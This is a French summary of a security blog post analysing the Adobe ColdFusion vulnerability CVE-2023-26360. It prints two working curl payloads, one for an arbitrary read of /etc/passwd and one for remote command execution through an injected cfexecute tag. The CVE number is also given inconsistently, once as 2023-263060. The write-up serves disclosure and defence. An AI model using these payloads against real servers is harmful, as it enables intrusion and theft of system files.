Introduction
La CVE-2023-263060 a révélé une faille critique dans Adobe ColdFusion, offrant une possibilité d’exécution de code à distance (RCE) sans authentification. Exploitée par le groupe SectorB01, affilié au gouvernement chinois, cette vulnérabilité a eu des conséquences significatives, notamment sur les agences gouvernementales américaines.
Exploitation de la Vulnérabilité
L’article détaille la configuration d’un environnement sous Ubuntu, mettant en lumière la polyvalence de l’application sur les systèmes Windows et Linux grâce à Java. L’analyse se concentre spécifiquement sur la version 2021 de ColdFusion.
Reproduction de la Vulnérabilité
Deux méthodes d’exploitation sont explorées :
- Lecture arbitraire de fichiers : Utilisation d’une preuve de concept (PoC) avec Curl pour lire le fichier « /etc/passwd » sous Linux.Commande Curl :
curl -X POST 'http://[IP_SERVER]/CFIDE/wizards/common/utils.cfc?method=randomstr&_cfclient=true&inpassword=foo' -d '_variables={"_metadata":{"classname":"a/··/··/··/··/··/etc/passwd"},"_variables":[]}' - Exécution de code à distance : Injection d’une balise cfexecute via Curl pour effectuer une demande avec un tag cfexecute injecté.Commande Curl :
curl -k -X POST 'http://[IP_SERVER]/CFIDE/AIR/Conflict.cfc?method=test&_cfclient=true' -d '_variables=<cfexecute name='/usr/bin/gnome-calculator'></cfexecute>'
L’auteur procède à une analyse comparative des fichiers de bibliothèque JSONUtils.java, identifiant l’ajout crucial d’une variable statique autorisant la désérialisation non autorisée de CFCs (JSON).
Conclusion
La CVE-2023-26360 expose un risque sérieux de RCE non authentifiée dans Adobe ColdFusion, exploitée avec succès par le groupe SectorB01. Les versions 2018 et 2021 sont touchées, soulignant l’impératif d’une vigilance sécuritaire constante. L’article insiste sur la nécessité de mesures proactives pour garantir la sécurité des applications, mettant en avant la nécessité de mises à jour régulières et d’une sensibilisation continue des développeurs.
Source : Blog SecureLayer7
